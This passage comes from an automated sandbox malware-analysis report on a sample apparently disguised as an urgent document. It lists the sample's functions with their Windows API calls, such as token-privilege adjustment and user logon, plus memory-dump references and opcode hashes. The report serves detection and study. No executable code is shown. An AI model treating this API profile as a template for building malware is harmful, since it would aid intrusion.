                                                          • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                          • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID: 0eL
                                                        • API String ID: 2893107130-3167399643
                                                        • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                        • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                        • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                        • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                        Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                        • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                        • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                        • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                        Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                        • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                        • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                        • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                        Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                        • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 69dc32ec314a8cd99589289b842828c25465f5886d8d921c36f64ffc138c73b7
                                                        • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                        • Opcode Fuzzy Hash: 69dc32ec314a8cd99589289b842828c25465f5886d8d921c36f64ffc138c73b7
                                                        • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                        Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                        • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                        • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                        • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                        Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                        • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                        • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                        • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                        Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                        • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                        • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                        • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                        Function 016B39A3 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,016B399E,?,?,00000008,?,?,016B1CF4,00000000), ref: 016B3BD0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: da136654df930b236189e8f7bc87de00de9284155cf7b3b5e476e3c0dab77054
                                                        • Instruction ID: f24a2e32aa38e40dc7e13dd7b7185151add735a3edc9db7ef385ad6fe2637feb
                                                        • Opcode Fuzzy Hash: da136654df930b236189e8f7bc87de00de9284155cf7b3b5e476e3c0dab77054
                                                        • Instruction Fuzzy Hash: FBB1F8316106099FE715CF2CC8CABA57BA0FF45364F258658E99ACF3A1C735E992CB40
                                                        Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                        • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                        • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                        • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                        Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                        • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                        • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                        • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                        Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                        • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                        • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                        • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                        Function 016AC7F0 Relevance: .9, Instructions: 853COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7852ca8b903349b904968755c7ca20c9d614793d8996a0fc5008911638cda20f
                                                        • Instruction ID: f712f693daaa8e0aa9bd6c3ab3b0d0f29dfc90bee5f5ab6ee3f2e83ae5d09561
                                                        • Opcode Fuzzy Hash: 7852ca8b903349b904968755c7ca20c9d614793d8996a0fc5008911638cda20f
                                                        • Instruction Fuzzy Hash: 25822D76B083108FD748DF18D89075EF7E2ABC8314F1A893DA999E3354DA74EC518B86
                                                        Function 016B00D9 Relevance: .6, Instructions: 637COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 618e4da9d776c1b9b502c904b6375e297dd747ba401020b24bb969fc56ff6982
                                                        • Instruction ID: 6b8a57ddbda4de3fd5ba410fa827cf098c3a7f93f216592a052a47f845712378
                                                        • Opcode Fuzzy Hash: 618e4da9d776c1b9b502c904b6375e297dd747ba401020b24bb969fc56ff6982
                                                        • Instruction Fuzzy Hash: 9D32F121D29F014DD7339539CC72376AA58AFA72D4F15E727F81AB5E9AEB28C1C34200
                                                        Function 00418808 Relevance: .6, Instructions: 590COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                        • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                        • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                        • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                        Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                        Function 016751EE Relevance: .3, Instructions: 344COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                        • Instruction ID: 898ef5f38d115a5a32509914f6c24b8cc3280e53639167270fba5dbb0233fa89
                                                        • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                        • Instruction Fuzzy Hash: B8D17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                        Function 004225FA Relevance: .3, Instructions: 341COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                        Function 01676EAF Relevance: .2, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                        • Instruction ID: 20857da3dc0ff06886f83ee634914f9072eba74d976cf9453ecf5f081e397aef
                                                        • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                        • Instruction Fuzzy Hash: DAA192B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
                                                        Function 016A5980 Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                        • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                        • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
